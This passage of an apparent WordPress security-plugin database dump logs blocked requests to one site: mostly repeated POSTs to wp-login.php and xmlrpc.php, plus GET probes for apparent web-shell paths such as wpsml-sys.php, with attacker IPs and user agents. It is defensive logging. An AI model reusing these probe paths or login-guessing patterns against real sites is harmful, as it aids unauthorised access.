Firefox\\/96\"}','F7BrlRV2ySm4Hg9a36ZchTJ8',0,1663903089.2988,546,'','POST',403,0,600,0,1,'',0),('185.104.28.48',3110607920,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','zmIMklSuF1jh9qgKNep2bLPO',0,1663903668.2315,524,'','POST',403,0,600,0,1,'',0),('185.104.28.48',3110607920,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Vsz6ONJD2ArWiyGRkTwL7pHK',0,1663903669.5914,535,'','POST',403,0,600,0,1,'',0),('68.183.75.82',1152863058,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','TdcZsh5JvLX8N4oHDF32mlue',0,1663903676.2371,524,'','POST',403,0,600,0,1,'',0),('185.2.4.56',3103917112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','jfSiJswHDrkzvANd4T1y67VP',0,1663903712.5693,2258,'','POST',403,0,600,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FJzHC8LKDWSg4xNQpVtu7o2l',0,1663903715.4210,457,'','POST',403,0,600,0,1,'',0),('46.101.62.7',778386951,'','https://www.cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/www.cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fwww.cteisys.com%2Fwp-admin%2F\"}','RULNQOxndEq4pwKH1ZfTFur3',0,1663904230.1825,569,'','POST',403,0,600,0,1,'',0),('103.129.178.69',1736553029,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qATuWjvx7f3d1isecGYJIUgF',0,1663904350.4448,1622,'','POST',403,0,600,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mMcIlFqa1yPVGSkUKLnsijW4',0,1663904960.7150,515,'','POST',403,0,600,0,1,'',0),('192.99.201.91',3227765083,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','0IMfFte5GHx7RaVJhY9zBucg',0,1663905117.1330,1165,'','POST',403,0,600,0,1,'',0),('192.185.82.92',3233370716,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7fU9enIL25xkui6qF8SHhw3C',0,1663905539.0636,588,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','zAJqjR5Qp4rG1cdyVEHaXl2O',0,1663906517.8357,897,'','POST',403,0,600,0,1,'',0),('51.79.242.130',860877442,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OPNx3Utlv1eSByMcR4J7689m',0,1663906637.5674,539,'','POST',403,0,600,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ImxVPbrDMJ51Ff8XiTousklQ',0,1663907177.4250,623,'','POST',403,0,600,0,1,'',0),('114.132.250.235',1921317611,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w4h6ESJfZNe3IYVLW7BmR9GX',0,1663907722.5354,480,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','ujAyVfs95PNcFw7aDz4dBp0x',0,1663907858.6709,1229,'','POST',403,0,600,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','ejp78bIO6ZSGWdwh4R3CA2UQ',0,1663907898.2712,1129,'','POST',403,0,600,0,1,'',0),('172.104.81.115',2892517747,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jaqpvt1BeHXjED0QwPN94zf3',0,1663908192.7238,507,'','POST',403,0,600,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lB4byq628Y0rFQetfNunoKwx',0,1663908675.4345,547,'','POST',403,0,600,0,1,'',0),('24.41.60.59',405355579,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JoRP5HeCOxSDFcwrlf3hEvTq',0,1663909173.4891,468,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','orwQh2CESAu7y0XUFOgJWzje',0,1663909216.9961,2380,'','POST',403,0,600,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','dlZWzEXRhHT1IstcuP8MfJnb',0,1663909257.5015,3304,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11B554a Safari\\/9537.53\"}','rftwo8Hh5FvbImzjkSqRyTdN',0,1663909622.7234,1449,'','POST',403,0,600,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i5JgFdSAHUBqlPY3b8tKCnw1',0,1663909628.8922,497,'','POST',403,0,600,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fXALVqjBZ6cs2xz9ihatGMPO',0,1663910153.8905,533,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','kNueFDbKSAzqZBTrlpO5CEnL',0,1663910588.1884,1517,'','POST',403,0,600,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','moB1DHiwkUYfC5dsRKSbF0cn',0,1663910628.2345,5483,'','POST',403,0,600,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UXT2YqmAr8n5SlkCGKJdaLvV',0,1663910635.9287,579,'','POST',403,0,600,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','5KOBxlNrgCJd0f3mPcoIkE8i',0,1663910943.4063,1744,'','POST',403,0,600,0,1,'',0),('103.179.87.147',1739806611,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sj16Ooqaylci2MpRz3d9r7HV',0,1663911134.2718,492,'','POST',403,0,600,0,1,'',0),('163.172.110.175',2745986735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gZvJaACVLY3b6Iih5BDFRqe9',0,1663911646.2054,1242,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','AOST0QzdH29y7t1IK8LsNcUY',0,1663911971.9293,19504,'','POST',403,0,600,0,1,'',0),('144.126.223.177',2424233905,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','cmjNIX2preiTLHa6qPExtODY',0,1663912004.6687,527,'','POST',403,0,600,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qGsiOEcRr3YWV9TyUzkefAaF',0,1663912177.0334,543,'','POST',403,0,600,0,1,'',0),('64.227.187.183',1088666551,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xLnwicq95TfgA3U1KJhSpeDz',0,1663912698.3164,520,'','POST',403,0,600,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hCBve38sUQcjVFSIXEObgt72',0,1663913220.4201,4327,'','POST',403,0,600,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','abslqM4IeZkBwdtCrWSGD235',0,1663913355.8553,1356,'','POST',403,0,600,0,1,'',0),('147.182.150.188',2478216892,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RVNknLMAcS8j5fb2sm7vPrqW',0,1663913733.2451,554,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qczpNkKEmvnVabP1O0rjLgUG',0,1663914285.1428,589,'','POST',403,0,600,0,1,'',0),('185.233.116.44',3119084588,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','SeaNQ5u8RzHKO0mWJLqY92wT',0,1663914618.9561,569,'','POST',403,0,600,0,1,'',0),('185.233.116.44',3119084588,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','BgQdIMZVUrA4zhyWJGlpNE56',0,1663914620.5188,648,'','POST',403,0,600,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','gi9ZHeLhIVwDcFM5sNux764Y',0,1663914773.3062,12324,'','POST',403,0,600,0,1,'',0),('51.79.30.143',860823183,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SywEgcnJK4rb1a6FIfWRLYU7',0,1663914785.4289,772,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Cywfa4keg17bslPNTuUILn9K',0,1663914813.6857,643,'','POST',403,0,600,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ebxm9FI6MuTWn4GjKSsCRDrz',0,1663915320.1186,490,'','POST',403,0,600,0,1,'',0),('188.40.224.241',3156795633,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L2RTSw49soylajgi3HKnUXdN',0,1663915840.3503,555,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','QPJtb7U3wKeByuTsVX48ZE6H',0,1663916242.5971,17056,'','POST',403,0,600,0,1,'',0),('34.136.77.170',579358122,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','wgHAzQ3oCGj2mcDeUuaVXyYd',0,1663916286.8136,607,'','POST',403,0,600,0,1,'',0),('34.136.77.170',579358122,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','tEQMZCLnzevwioSVcIuq9Kal',0,1663916287.8320,584,'','POST',403,0,600,0,1,'',0),('112.213.89.124',1893030268,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OZcFD18jpCVAG6H7TmlShRbE',0,1663916363.7599,488,'','POST',403,0,600,0,1,'',0),('18.224.85.64',316691776,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zxmcne39yaI72qzbLMRDYVNk',0,1663916947.5174,616,'','POST',403,0,600,0,1,'',0),('147.139.178.177',2475406001,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3DxAzJ86ewg54OB91WESaCNf',0,1663917474.2963,583,'','POST',403,0,600,0,1,'',0),('188.166.183.39',3165042471,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','Vu3XgS9tfmKaTGkeEUqhBlHc',0,1663917634.7523,17302,'','POST',403,0,600,0,1,'',0),('209.182.195.110',3518415726,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','n5rq6mLf2teHY7goZCualIJS',0,1663917675.5677,539,'','POST',403,0,600,0,1,'',0),('161.35.205.6',2703478022,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MroKhgbDYLVzdtTI8fA52eR9',0,1663918007.3470,469,'','POST',403,0,600,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xVi8tIXmQNRLYo47CPEMvp2Z',0,1663918559.7409,710,'','POST',403,0,600,0,1,'',0),('69.163.196.200',1168360648,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','h4VuNsXQ1ezCfHZaOn23BdPI',0,1663919064.8487,17247,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','862OIqwS0yXUQFCDV3m1zHRi',0,1663919107.6225,1950,'','POST',403,0,600,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aBOWZIbqe47gUpdGPl32VKwS',0,1663919115.0124,529,'','POST',403,0,600,0,1,'',0),('207.154.234.6',3483036166,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wMuZAip8bhv3n7skfQOCWGlj',0,1663919657.0233,576,'','POST',403,0,600,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r94gpVYqswFoJvWMiHNLjKO0',0,1663920216.1672,634,'','POST',403,0,600,0,1,'',0),('47.96.74.105',794839657,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','y8dhMLRVEqNYj40ZWADogmSb',0,1663920487.4733,17790,'','POST',403,0,600,0,1,'',0),('47.105.73.13',795429133,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','5xF6kQhKrGcjtgHoJTVqDLCu',0,1663920536.3205,1433,'','POST',403,0,600,0,1,'',0),('54.207.36.58',919544890,'','http://cteisys.com/wp-admin/maint/update.php?1502','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','qzNmbnPp4dUjYfsTyMr7koe8',0,1663920970.2445,615,'','GET',403,0,700,0,1,'',0),('54.207.36.58',919544890,'','http://cteisys.com/wp-content/plugins/wpsml-sys.php?1479','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"cteisys.com\"}','9Nq5Mljvr7JxSKZC1WPGDyEp',0,1663921027.0055,289,'','GET',403,0,700,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qZs8hRAeLJ6wK2WXdDgp157c',0,1663921293.3127,515,'','POST',403,0,600,0,1,'',0),('161.97.172.18',2707532818,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','WuEOBLd1Ixm2TFHs9zVNDS75',0,1663921721.9383,471,'','POST',403,0,600,0,1,'',0),('161.97.172.18',2707532818,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','y1uG2tzIC7XnNPx6hUiVjSJr',0,1663921723.3682,488,'','POST',403,0,600,0,1,'',0),('138.197.144.236',2328203500,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FpOPcZHy5me0BjaNJYs1Mlnu',0,1663921856.1881,496,'','POST',403,0,600,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','QwLVGlarvhyYnSK7qJR5bzgs',0,1663921913.0528,1226,'','POST',403,0,600,0,1,'',0),('103.130.218.178',1736628914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','Z4U6caKBAP38tInyLsCFqH1h',0,1663921955.5617,532,'','POST',403,0,600,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GrR0QEI9zAUwSMh8cD7TuYty',0,1663922433.3560,598,'','POST',403,0,600,0,1,'',0),('184.75.223.219',3091980251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Si31Kxv8qjtoNcUAYMBT0kpe',0,1663922527.2958,2394,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WU1LRvHz46CQlhpYVIBxA7a2',0,1663923014.9675,465,'','POST',403,0,600,0,1,'',0),('142.93.54.10',2388473354,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','0mnXZTHtdQUIEwaL1FW6vkz9',0,1663923341.7745,1360,'','POST',403,0,600,0,1,'',0),('51.178.76.51',867322931,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','oCVjDnZWmRJ953bw1S8LQuix',0,1663923383.9189,1259,'','POST',403,0,600,0,1,'',0),('82.165.18.75',1386549835,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vMsDP0TXoVR1dZ7LqFkieNW6',0,1663923565.6207,483,'','POST',403,0,600,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','l4NgPbKAkeB1Qsniq9d7yLHD',0,1663924176.3111,558,'','POST',403,0,600,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VXyk3z8L7rT14oEhg5iRubtY',0,1663924738.9664,497,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','U6KhcxNOaeGrVHdyJ1YkInXl',0,1663924775.4811,469,'','POST',403,0,600,0,1,'',0),('104.41.221.5',1747574021,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','tFb85fQJeiaknP3uDsYUARLz',0,1663924817.4901,1396,'','POST',403,0,600,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G6irLZov97S5n2tDkWJ4HEhU',0,1663925239.7578,506,'','POST',403,0,600,0,1,'',0),('185.93.182.171',3109926571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','d2G4PwfZBlUp3LNyJAOKvb1o',0,1663925762.6065,2338,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','5Enp4FZVecKSIBaGxbWdHjk1',0,1663925794.9524,476,'','POST',403,0,600,0,1,'',0),('91.238.165.67',1542366531,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','yfnVw78H6UladJDZgLcTYQKh',0,1663926172.1672,508,'','POST',403,0,600,0,1,'',0),('91.238.165.67',1542366531,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','WEKUvXk17OofbAlPH4JITjMx',0,1663926173.4859,464,'','POST',403,0,600,0,1,'',0),('134.209.184.76',2261891148,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 